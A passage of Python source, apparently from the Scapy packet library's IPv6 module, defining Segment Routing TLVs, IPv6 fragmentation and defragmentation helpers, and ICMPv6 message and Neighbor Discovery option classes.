1029 def register_variant(cls):
1030 cls.registered_sr_tlv[cls.type.default] = cls
1032 @classmethod
1033 def dispatch_hook(cls, pkt=None, *args, **kargs):
1034 if pkt:
1035 tmp_type = ord(pkt[:1])
1036 return cls.registered_sr_tlv.get(tmp_type, cls)
1037 return cls
1040class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1041 name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
1042 # draft-ietf-6man-segment-routing-header-06 3.1.1
1043 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1044 ByteField("len", 18),
1045 ByteField("reserved", 0),
1046 ByteField("flags", 0),
1047 IP6Field("ingress_node", "::1")]
1050class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
1051 name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1052 # draft-ietf-6man-segment-routing-header-06 3.1.2
1053 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1054 ByteField("len", 18),
1055 ByteField("reserved", 0),
1056 ByteField("flags", 0),
1057 IP6Field("egress_node", "::1")]
1060class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1061 name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1062 # RFC8754 sect 2.1.1.1, Pad1 is a single byte
1063 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)]
1066class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1067 name = "IPv6 Option Header Segment Routing - PadN TLV"
1068 # RFC8754 sect 2.1.1.2
1069 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1070 FieldLenField("len", None, length_of="padding", fmt="B"),
1071 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1074class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1075 name = "IPv6 Option Header Segment Routing - HMAC TLV"
1076 # RFC8754 sect 2.1.2
1077 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1078 FieldLenField("len", None, length_of="hmac",
1079 adjust=lambda _, x: x + 48),
1080 BitField("D", 0, 1),
1081 BitField("reserved", 0, 15),
1082 IntField("hmackeyid", 0),
1083 StrLenField("hmac", "",
1084 length_from=lambda pkt: pkt.len - 48)]
1087class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1088 name = "IPv6 Option Header Segment Routing"
1089 # RFC8754 sect 2. + flag bits from draft 06
1090 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1091 ByteField("len", None),
1092 ByteField("type", 4),
1093 ByteField("segleft", None),
1094 ByteField("lastentry", None),
1095 BitField("unused1", 0, 1),
1096 BitField("protected", 0, 1),
1097 BitField("oam", 0, 1),
1098 BitField("alert", 0, 1),
1099 BitField("hmac", 0, 1),
1100 BitField("unused2", 0, 3),
1101 ShortField("tag", 0),
1102 IP6ListField("addresses", ["::1"],
1103 count_from=lambda pkt: (pkt.lastentry + 1)),
1104 PacketListField("tlv_objects", [],
1105 IPv6ExtHdrSegmentRoutingTLV,
1106 length_from=lambda pkt: 8 * pkt.len - 16 * (
1107 pkt.lastentry + 1
1108 ))]
1110 overload_fields = {IPv6: {"nh": 43}}
1112 def post_build(self, pkt, pay):
1114 if self.len is None:
1116 # The extension must be align on 8 bytes
1117 tmp_mod = (-len(pkt) + 8) % 8
1118 if tmp_mod == 1:
1119 tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1120 pkt += raw(tlv)
1121 elif tmp_mod >= 2:
1122 # Add the padding extension
1123 tmp_pad = b"\x00" * (tmp_mod - 2)
1124 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1125 pkt += raw(tlv)
1127 tmp_len = (len(pkt) - 8) // 8
1128 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1130 if self.segleft is None:
1131 tmp_len = len(self.addresses)
1132 if tmp_len:
1133 tmp_len -= 1
1134 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1136 if self.lastentry is None:
1137 lastentry = len(self.addresses)
1138 if lastentry == 0:
1139 warning(
1140 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1141 )
1142 else:
1143 lastentry -= 1
1144 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1146 return _IPv6ExtHdr.post_build(self, pkt, pay)
1149# Fragmentation Header #
1151class IPv6ExtHdrFragment(_IPv6ExtHdr):
1152 name = "IPv6 Extension Header - Fragmentation header"
1153 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1154 BitField("res1", 0, 8),
1155 BitField("offset", 0, 13),
1156 BitField("res2", 0, 2),
1157 BitField("m", 0, 1),
1158 IntField("id", None)]
1159 overload_fields = {IPv6: {"nh": 44}}
1161 def guess_payload_class(self, p):
1162 if self.offset > 0:
1163 return Raw
1164 else:
1165 return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1168def defragment6(packets):
1169 """
1170 Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1171 Crap is dropped. What lacks is completed by 'X' characters.
1172 """
1174 # Remove non fragments
1175 lst = [x for x in packets if IPv6ExtHdrFragment in x]
1176 if not lst:
1177 return []
1179 id = lst[0][IPv6ExtHdrFragment].id
1181 llen = len(lst)
1182 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1183 if len(lst) != llen:
1184 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
1186 # reorder fragments
1187 res = []
1188 while lst:
1189 min_pos = 0
1190 min_offset = lst[0][IPv6ExtHdrFragment].offset
1191 for p in lst:
1192 cur_offset = p[IPv6ExtHdrFragment].offset
1193 if cur_offset < min_offset:
1194 min_pos = 0
1195 min_offset = cur_offset
1196 res.append(lst[min_pos])
1197 del lst[min_pos]
1199 # regenerate the fragmentable part
1200 fragmentable = b""
1201 frag_hdr_len = 8
1202 for p in res:
1203 q = p[IPv6ExtHdrFragment]
1204 offset = 8 * q.offset
1205 if offset != len(fragmentable):
1206 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
1207 frag_data_len = p[IPv6].plen
1208 if frag_data_len is not None:
1209 frag_data_len -= frag_hdr_len
1210 fragmentable += b"X" * (offset - len(fragmentable))
1211 fragmentable += raw(q.payload)[:frag_data_len]
1213 # Regenerate the unfragmentable part.
1214 q = res[0].copy()
1215 nh = q[IPv6ExtHdrFragment].nh
1216 q[IPv6ExtHdrFragment].underlayer.nh = nh
1217 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1218 del q[IPv6ExtHdrFragment].underlayer.payload
1219 q /= conf.raw_layer(load=fragmentable)
1220 del q.plen
1222 if q[IPv6].underlayer:
1223 q[IPv6] = IPv6(raw(q[IPv6]))
1224 else:
1225 q = IPv6(raw(q))
1226 return q
1229def fragment6(pkt, fragSize):
1230 """
1231 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1232 expected maximum size of fragment data (MTU). The list of packets is
1233 returned.
1235 If packet does not contain an IPv6ExtHdrFragment class, it is added to
1236 first IPv6 layer found. If no IPv6 layer exists packet is returned in
1237 result list unmodified.
1238 """
1240 pkt = pkt.copy()
1242 if IPv6ExtHdrFragment not in pkt:
1243 if IPv6 not in pkt:
1244 return [pkt]
1246 layer3 = pkt[IPv6]
1247 data = layer3.payload
1248 frag = IPv6ExtHdrFragment(nh=layer3.nh)
1250 layer3.remove_payload()
1251 del layer3.nh
1252 del layer3.plen
1254 frag.add_payload(data)
1255 layer3.add_payload(frag)
1257 # If the payload is bigger than 65535, a Jumbo payload must be used, as
1258 # an IPv6 packet can't be bigger than 65535 bytes.
1259 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1260 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
1261 return []
1263 s = raw(pkt) # for instantiation to get upper layer checksum right
1265 if len(s) <= fragSize:
1266 return [pkt]
1268 # Fragmentable part : fake IPv6 for Fragmentable part length computation
1269 fragPart = pkt[IPv6ExtHdrFragment].payload
1270 tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1271 fragPartLen = len(tmp) - 40 # basic IPv6 header length
1272 fragPartStr = s[-fragPartLen:]
1274 # Grab Next Header for use in Fragment Header
1275 nh = pkt[IPv6ExtHdrFragment].nh
1277 # Keep fragment header
1278 fragHeader = pkt[IPv6ExtHdrFragment]
1279 del fragHeader.payload # detach payload
1281 # Unfragmentable Part
1282 unfragPartLen = len(s) - fragPartLen - 8
1283 unfragPart = pkt
1284 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
1286 # Cut the fragmentable part to fit fragSize. Inner fragments have
1287 # a length that is an integer multiple of 8 octets. last Frag MTU
1288 # can be anything below MTU
1289 lastFragSize = fragSize - unfragPartLen - 8
1290 innerFragSize = lastFragSize - (lastFragSize % 8)
1292 if lastFragSize <= 0 or innerFragSize == 0:
1293 warning("Provided fragment size value is too low. " +
1294 "Should be more than %d" % (unfragPartLen + 8))
1295 return [unfragPart / fragHeader / fragPart]
1297 remain = fragPartStr
1298 res = []
1299 fragOffset = 0 # offset, incremeted during creation
1300 fragId = random.randint(0, 0xffffffff) # random id ...
1301 if fragHeader.id is not None: # ... except id provided by user
1302 fragId = fragHeader.id
1303 fragHeader.m = 1
1304 fragHeader.id = fragId
1305 fragHeader.nh = nh
1307 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1308 while True:
1309 if (len(remain) > lastFragSize):
1310 tmp = remain[:innerFragSize]
1311 remain = remain[innerFragSize:]
1312 fragHeader.offset = fragOffset # update offset
1313 fragOffset += (innerFragSize // 8) # compute new one
1314 if IPv6 in unfragPart:
1315 unfragPart[IPv6].plen = None
1316 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1317 res.append(tempo)
1318 else:
1319 fragHeader.offset = fragOffset # update offSet
1320 fragHeader.m = 0
1321 if IPv6 in unfragPart:
1322 unfragPart[IPv6].plen = None
1323 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1324 res.append(tempo)
1325 break
1326 return res
1329#############################################################################
1330#############################################################################
1331# ICMPv6* Classes #
1332#############################################################################
1333#############################################################################
1336icmp6typescls = {1: "ICMPv6DestUnreach",
1337 2: "ICMPv6PacketTooBig",
1338 3: "ICMPv6TimeExceeded",
1339 4: "ICMPv6ParamProblem",
1340 128: "ICMPv6EchoRequest",
1341 129: "ICMPv6EchoReply",
1342 130: "ICMPv6MLQuery", # MLDv1 or MLDv2
1343 131: "ICMPv6MLReport",
1344 132: "ICMPv6MLDone",
1345 133: "ICMPv6ND_RS",
1346 134: "ICMPv6ND_RA",
1347 135: "ICMPv6ND_NS",
1348 136: "ICMPv6ND_NA",
1349 137: "ICMPv6ND_Redirect",
1350 # 138: Do Me - RFC 2894 - Seems painful
1351 139: "ICMPv6NIQuery",
1352 140: "ICMPv6NIReply",
1353 141: "ICMPv6ND_INDSol",
1354 142: "ICMPv6ND_INDAdv",
1355 143: "ICMPv6MLReport2",
1356 144: "ICMPv6HAADRequest",
1357 145: "ICMPv6HAADReply",
1358 146: "ICMPv6MPSol",
1359 147: "ICMPv6MPAdv",
1360 # 148: Do Me - SEND related - RFC 3971
1361 # 149: Do Me - SEND related - RFC 3971
1362 151: "ICMPv6MRD_Advertisement",
1363 152: "ICMPv6MRD_Solicitation",
1364 153: "ICMPv6MRD_Termination",
1365 # 154: Do Me - FMIPv6 Messages - RFC 5568
1366 155: "ICMPv6RPL", # RFC 6550
1367 }
1369icmp6typesminhdrlen = {1: 8,
1370 2: 8,
1371 3: 8,
1372 4: 8,
1373 128: 8,
1374 129: 8,
1375 130: 24,
1376 131: 24,
1377 132: 24,
1378 133: 8,
1379 134: 16,
1380 135: 24,
1381 136: 24,
1382 137: 40,
1383 # 139:
1384 # 140
1385 141: 8,
1386 142: 8,
1387 143: 8,
1388 144: 8,
1389 145: 8,
1390 146: 8,
1391 147: 8,
1392 151: 8,
1393 152: 4,
1394 153: 4,
1395 155: 4
1396 }
1398icmp6types = {1: "Destination unreachable",
1399 2: "Packet too big",
1400 3: "Time exceeded",
1401 4: "Parameter problem",
1402 100: "Private Experimentation",
1403 101: "Private Experimentation",
1404 128: "Echo Request",
1405 129: "Echo Reply",
1406 130: "MLD Query",
1407 131: "MLD Report",
1408 132: "MLD Done",
1409 133: "Router Solicitation",
1410 134: "Router Advertisement",
1411 135: "Neighbor Solicitation",
1412 136: "Neighbor Advertisement",
1413 137: "Redirect Message",
1414 138: "Router Renumbering",
1415 139: "ICMP Node Information Query",
1416 140: "ICMP Node Information Response",
1417 141: "Inverse Neighbor Discovery Solicitation Message",
1418 142: "Inverse Neighbor Discovery Advertisement Message",
1419 143: "MLD Report Version 2",
1420 144: "Home Agent Address Discovery Request Message",
1421 145: "Home Agent Address Discovery Reply Message",
1422 146: "Mobile Prefix Solicitation",
1423 147: "Mobile Prefix Advertisement",
1424 148: "Certification Path Solicitation",
1425 149: "Certification Path Advertisement",
1426 151: "Multicast Router Advertisement",
1427 152: "Multicast Router Solicitation",
1428 153: "Multicast Router Termination",
1429 155: "RPL Control Message",
1430 200: "Private Experimentation",
1431 201: "Private Experimentation"}
1434class _ICMPv6(Packet):
1435 name = "ICMPv6 dummy class"
1436 overload_fields = {IPv6: {"nh": 58}}
1438 def post_build(self, p, pay):
1439 p += pay
1440 if self.cksum is None:
1441 chksum = in6_chksum(58, self.underlayer, p)
1442 p = p[:2] + struct.pack("!H", chksum) + p[4:]
1443 return p
1445 def hashret(self):
1446 return self.payload.hashret()
1448 def answers(self, other):
1449 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1450 if (isinstance(self.underlayer, IPerror6) or
1451 isinstance(self.underlayer, _IPv6ExtHdr) and
1452 isinstance(other, _ICMPv6)):
1453 if not ((self.type == other.type) and
1454 (self.code == other.code)):
1455 return 0
1456 return 1
1457 return 0
1460class _ICMPv6Error(_ICMPv6):
1461 name = "ICMPv6 errors dummy class"
1463 def guess_payload_class(self, p):
1464 return IPerror6
1467class ICMPv6Unknown(_ICMPv6):
1468 name = "Scapy6 ICMPv6 fallback class"
1469 fields_desc = [ByteEnumField("type", 1, icmp6types),
1470 ByteField("code", 0),
1471 XShortField("cksum", None),
1472 StrField("msgbody", "")]
1475# RFC 2460 #
1477class ICMPv6DestUnreach(_ICMPv6Error):
1478 name = "ICMPv6 Destination Unreachable"
1479 fields_desc = [ByteEnumField("type", 1, icmp6types),
1480 ByteEnumField("code", 0, {0: "No route to destination",
1481 1: "Communication with destination administratively prohibited", # noqa: E501
1482 2: "Beyond scope of source address", # noqa: E501
1483 3: "Address unreachable",
1484 4: "Port unreachable"}),
1485 XShortField("cksum", None),
1486 ByteField("length", 0),
1487 X3BytesField("unused", 0),
1488 _ICMPExtensionPadField(),
1489 _ICMPExtensionField()]
1490 post_dissection = _ICMP_extpad_post_dissection
1493class ICMPv6PacketTooBig(_ICMPv6Error):
1494 name = "ICMPv6 Packet Too Big"
1495 fields_desc = [ByteEnumField("type", 2, icmp6types),
1496 ByteField("code", 0),
1497 XShortField("cksum", None),
1498 IntField("mtu", 1280)]
1501class ICMPv6TimeExceeded(_ICMPv6Error):
1502 name = "ICMPv6 Time Exceeded"
1503 fields_desc = [ByteEnumField("type", 3, icmp6types),
1504 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1505 1: "fragment reassembly time exceeded"}), # noqa: E501
1506 XShortField("cksum", None),
1507 ByteField("length", 0),
1508 X3BytesField("unused", 0),
1509 _ICMPExtensionPadField(),
1510 _ICMPExtensionField()]
1511 post_dissection = _ICMP_extpad_post_dissection
1514# The default pointer value is set to the next header field of
1515# the encapsulated IPv6 packet
1518class ICMPv6ParamProblem(_ICMPv6Error):
1519 name = "ICMPv6 Parameter Problem"
1520 fields_desc = [ByteEnumField("type", 4, icmp6types),
1521 ByteEnumField(
1522 "code", 0,
1523 {0: "erroneous header field encountered",
1524 1: "unrecognized Next Header type encountered",
1525 2: "unrecognized IPv6 option encountered",
1526 3: "first fragment has incomplete header chain"}),
1527 XShortField("cksum", None),
1528 IntField("ptr", 6)]
1531class ICMPv6EchoRequest(_ICMPv6):
1532 name = "ICMPv6 Echo Request"
1533 fields_desc = [ByteEnumField("type", 128, icmp6types),
1534 ByteField("code", 0),
1535 XShortField("cksum", None),
1536 XShortField("id", 0),
1537 XShortField("seq", 0),
1538 StrField("data", "")]
1540 def mysummary(self):
1541 return self.sprintf("%name% (id: %id% seq: %seq%)")
1543 def hashret(self):
1544 return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1547class ICMPv6EchoReply(ICMPv6EchoRequest):
1548 name = "ICMPv6 Echo Reply"
1549 type = 129
1551 def answers(self, other):
1552 # We could match data content between request and reply.
1553 return (isinstance(other, ICMPv6EchoRequest) and
1554 self.id == other.id and self.seq == other.seq and
1555 self.data == other.data)
1558# ICMPv6 Multicast Listener Discovery (RFC2710) #
1560# tous les messages MLD sont emis avec une adresse source lien-locale
1561# -> Y veiller dans le post_build si aucune n'est specifiee
1562# La valeur de Hop-Limit doit etre de 1
1563# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1564# header. (The router alert option is necessary to cause routers to
1565# examine MLD messages sent to multicast addresses in which the router
1566# itself has no interest"
1567class _ICMPv6ML(_ICMPv6):
1568 fields_desc = [ByteEnumField("type", 130, icmp6types),
1569 ByteField("code", 0),
1570 XShortField("cksum", None),
1571 ShortField("mrd", 0),
1572 ShortField("reserved", 0),
1573 IP6Field("mladdr", "::")]
1575# general queries are sent to the link-scope all-nodes multicast
1576# address ff02::1, with a multicast address field of 0 and a MRD of
1577# [Query Response Interval]
1578# Default value for mladdr is set to 0 for a General Query, and
1579# overloaded by the user for a Multicast Address specific query
1580# TODO : See what we can do to automatically include a Router Alert
1581# Option in a Destination Option Header.
1584class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
1585 name = "MLD - Multicast Listener Query"
1586 type = 130
1587 mrd = 10000 # 10s for mrd
1588 mladdr = "::"
1589 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1592# TODO : See what we can do to automatically include a Router Alert
1593# Option in a Destination Option Header.
1594class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
1595 name = "MLD - Multicast Listener Report"
1596 type = 131
1597 overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1599 def answers(self, query):
1600 """Check the query type"""
1601 return ICMPv6MLQuery in query
1603# When a node ceases to listen to a multicast address on an interface,
1604# it SHOULD send a single Done message to the link-scope all-routers
1605# multicast address (FF02::2), carrying in its multicast address field
1606# the address to which it is ceasing to listen
1607# TODO : See what we can do to automatically include a Router Alert
1608# Option in a Destination Option Header.
1611class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
1612 name = "MLD - Multicast Listener Done"
1613 type = 132
1614 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1617# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1619class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
1620 name = "MLDv2 - Multicast Listener Query"
1621 fields_desc = [ByteEnumField("type", 130, icmp6types),
1622 ByteField("code", 0),
1623 XShortField("cksum", None),
1624 ShortField("mrd", 10000),
1625 ShortField("reserved", 0),
1626 IP6Field("mladdr", "::"),
1627 BitField("Resv", 0, 4),
1628 BitField("S", 0, 1),
1629 BitField("QRV", 0, 3),
1630 ByteField("QQIC", 0),
1631 ShortField("sources_number", None),
1632 IP6ListField("sources", [],
1633 count_from=lambda pkt: pkt.sources_number)]
1635 # RFC8810 - 4. Message Formats
1636 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1638 def post_build(self, packet, payload):
1639 """Compute the 'sources_number' field when needed"""
1640 if self.sources_number is None:
1641 srcnum = struct.pack("!H", len(self.sources))
1642 packet = packet[:26] + srcnum + packet[28:]
1643 return _ICMPv6.post_build(self, packet, payload)
1646class ICMPv6MLDMultAddrRec(Packet):
1647 name = "ICMPv6 MLDv2 - Multicast Address Record"
1648 fields_desc = [ByteField("rtype", 4),
1649 FieldLenField("auxdata_len", None,
1650 length_of="auxdata",
1651 fmt="B"),
1652 FieldLenField("sources_number", None,
1653 length_of="sources",
1654 adjust=lambda p, num: num // 16),
1655 IP6Field("dst", "::"),
1656 IP6ListField("sources", [],
1657 length_from=lambda p: 16 * p.sources_number),
1658 StrLenField("auxdata", "",
1659 length_from=lambda p: p.auxdata_len)]
1661 def default_payload_class(self, packet):
1662 """Multicast Address Record followed by another one"""
1663 return self.__class__
1666class ICMPv6MLReport2(_ICMPv6): # RFC 3810
1667 name = "MLDv2 - Multicast Listener Report"
1668 fields_desc = [ByteEnumField("type", 143, icmp6types),
1669 ByteField("res", 0),
1670 XShortField("cksum", None),
1671 ShortField("reserved", 0),
1672 ShortField("records_number", None),
1673 PacketListField("records", [],
1674 ICMPv6MLDMultAddrRec,
1675 count_from=lambda p: p.records_number)]
1677 # RFC8810 - 4. Message Formats
1678 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1680 def post_build(self, packet, payload):
1681 """Compute the 'records_number' field when needed"""
1682 if self.records_number is None:
1683 recnum = struct.pack("!H", len(self.records))
1684 packet = packet[:6] + recnum + packet[8:]
1685 return _ICMPv6.post_build(self, packet, payload)
1687 def answers(self, query):
1688 """Check the query type"""
1689 return isinstance(query, ICMPv6MLQuery2)
1692# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1694# TODO:
1695# - 04/09/06 troglocan : find a way to automatically add a router alert
1696# option for all MRD packets. This could be done in a specific
1697# way when IPv6 is the under layer with some specific keyword
1698# like 'exthdr'. This would allow to keep compatibility with
1699# providing IPv6 fields to be overloaded in fields_desc.
1700#
1701# At the moment, if user inserts an IPv6 Router alert option
1702# none of the IPv6 default values of IPv6 layer will be set.
1704class ICMPv6MRD_Advertisement(_ICMPv6):
1705 name = "ICMPv6 Multicast Router Discovery Advertisement"
1706 fields_desc = [ByteEnumField("type", 151, icmp6types),
1707 ByteField("advinter", 20),
1708 XShortField("cksum", None),
1709 ShortField("queryint", 0),
1710 ShortField("robustness", 0)]
1711 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1712 # IPv6 Router Alert requires manual inclusion
1714 def extract_padding(self, s):
1715 return s[:8], s[8:]
1718class ICMPv6MRD_Solicitation(_ICMPv6):
1719 name = "ICMPv6 Multicast Router Discovery Solicitation"
1720 fields_desc = [ByteEnumField("type", 152, icmp6types),
1721 ByteField("res", 0),
1722 XShortField("cksum", None)]
1723 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1724 # IPv6 Router Alert requires manual inclusion
1726 def extract_padding(self, s):
1727 return s[:4], s[4:]
1730class ICMPv6MRD_Termination(_ICMPv6):
1731 name = "ICMPv6 Multicast Router Discovery Termination"
1732 fields_desc = [ByteEnumField("type", 153, icmp6types),
1733 ByteField("res", 0),
1734 XShortField("cksum", None)]
1735 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1736 # IPv6 Router Alert requires manual inclusion
1738 def extract_padding(self, s):
1739 return s[:4], s[4:]
1742# ICMPv6 Neighbor Discovery (RFC 2461) #
1744icmp6ndopts = {1: "Source Link-Layer Address",
1745 2: "Target Link-Layer Address",
1746 3: "Prefix Information",
1747 4: "Redirected Header",
1748 5: "MTU",
1749 6: "NBMA Shortcut Limit Option", # RFC2491
1750 7: "Advertisement Interval Option",
1751 8: "Home Agent Information Option",
1752 9: "Source Address List",
1753 10: "Target Address List",
1754 11: "CGA Option", # RFC 3971
1755 12: "RSA Signature Option", # RFC 3971
1756 13: "Timestamp Option", # RFC 3971
1757 14: "Nonce option", # RFC 3971
1758 15: "Trust Anchor Option", # RFC 3971
1759 16: "Certificate Option", # RFC 3971
1760 17: "IP Address Option", # RFC 4068
1761 18: "New Router Prefix Information Option", # RFC 4068
1762 19: "Link-layer Address Option", # RFC 4068
1763 20: "Neighbor Advertisement Acknowledgement Option",
1764 21: "CARD Request Option", # RFC 4065/4066/4067
1765 22: "CARD Reply Option", # RFC 4065/4066/4067
1766 23: "MAP Option", # RFC 4140
1767 24: "Route Information Option", # RFC 4191
1768 25: "Recursive DNS Server Option",
1769 26: "IPv6 Router Advertisement Flags Option"
1770 }
1772icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1773 2: "ICMPv6NDOptDstLLAddr",
1774 3: "ICMPv6NDOptPrefixInfo",
1775 4: "ICMPv6NDOptRedirectedHdr",
1776 5: "ICMPv6NDOptMTU",
1777 6: "ICMPv6NDOptShortcutLimit",
1778 7: "ICMPv6NDOptAdvInterval",
1779 8: "ICMPv6NDOptHAInfo",
1780 9: "ICMPv6NDOptSrcAddrList",
1781 10: "ICMPv6NDOptTgtAddrList",
1782 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1783 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1784 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1785 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1786 # 15: Do Me,
1787 # 16: Do Me,
1788 17: "ICMPv6NDOptIPAddr",
1789 18: "ICMPv6NDOptNewRtrPrefix",
1790 19: "ICMPv6NDOptLLA",
1791 # 18: Do Me,
1792 # 19: Do Me,
1793 # 20: Do Me,
1794 # 21: Do Me,
1795 # 22: Do Me,
1796 23: "ICMPv6NDOptMAP",
1797 24: "ICMPv6NDOptRouteInfo",
1798 25: "ICMPv6NDOptRDNSS",
1799 26: "ICMPv6NDOptEFA",
1800 31: "ICMPv6NDOptDNSSL",
1801 37: "ICMPv6NDOptCaptivePortal",
1802 38: "ICMPv6NDOptPREF64",
1803 }
1805icmp6ndraprefs = {0: "Medium (default)",
1806 1: "High",
1807 2: "Reserved",
1808 3: "Low"} # RFC 4191
1811class _ICMPv6NDGuessPayload:
1812 name = "Dummy ND class that implements guess_payload_class()"
1814 def guess_payload_class(self, p):
1815 if len(p) > 1:
1816 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1819# Beginning of ICMPv6 Neighbor Discovery Options.
1821class ICMPv6NDOptDataField(StrLenField):
1822 __slots__ = ["strip_zeros"]
1824 def __init__(self, name, default, strip_zeros=False, **kwargs):
1825 super().__init__(name, default, **kwargs)
1826 self.strip_zeros = strip_zeros
1828 def i2len(self, pkt, x):
1829 return len(self.i2m(pkt, x))
1831 def i2m(self, pkt, x):
1832 r = (len(x) + 2) % 8
1833 if r:
1834 x += b"\x00" * (8 - r)
1835 return x
1837 def m2i(self, pkt, x):
1838 if self.strip_zeros:
1839 x = x.rstrip(b"\x00")
1840 return x
1843class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1844 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1845 fields_desc = [ByteField("type", 0),
1846 FieldLenField("len", None, length_of="data", fmt="B",
1847 adjust=lambda pkt, x: (2 + x) // 8),
1848 ICMPv6NDOptDataField("data", "", strip_zeros=False,
1849 length_from=lambda pkt:
1850 8 * max(pkt.len, 1) - 2)]
1852# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1853# TODO: Revoir le coup du ETHER_ANY
1856class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1857 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1858 fields_desc = [ByteField("type", 1),
1859 ByteField("len", 1),
1860 SourceMACField("lladdr")]
1862 def mysummary(self):
1863 return self.sprintf("%name% %lladdr%")
1866class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1867 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1868 type = 2
1871class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1872 name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1873 fields_desc = [ByteField("type", 3),
1874 ByteField("len", 4),
1875 ByteField("prefixlen", 64),
1876 BitField("L", 1, 1),
1877 BitField("A", 1, 1),
1878 BitField("R", 0, 1),
1879 BitField("res1", 0, 5),
1880 XIntField("validlifetime", 0xffffffff),
1881 XIntField("preferredlifetime", 0xffffffff),
1882 XIntField("res2", 0x00000000),
1883 IP6Field("prefix", "::")]
1885 def mysummary(self):
1886 return self.sprintf("%name% %prefix%/%prefixlen% "
1887 "On-link %L% Autonomous Address %A% "
1888 "Router Address %R%")
1890# TODO: We should also limit the size of included packet to something
1891# like (initiallen - 40 - 2)
1894class TruncPktLenField(PacketLenField):
1895 def i2m(self, pkt, x):
1896 s = bytes(x)
1897 tmp_len = len(s)
1898 return s[:tmp_len - (tmp_len % 8)]
1900 def i2len(self, pkt, i):
1901 return len(self.i2m(pkt, i))
1904class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1905 name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1906 fields_desc = [ByteField("type", 4),
1907 FieldLenField("len", None, length_of="pkt", fmt="B",
1908 adjust=lambda pkt, x: (x + 8) // 8),
1909 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1910 TruncPktLenField("pkt", b"", IPv6,
1911 length_from=lambda pkt: 8 * pkt.len - 8)]
1913# See which value should be used for default MTU instead of 1280
1916class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1917 name = "ICMPv6 Neighbor Discovery Option - MTU"
1918 fields_desc = [ByteField("type", 5),
1919 ByteField("len", 1),
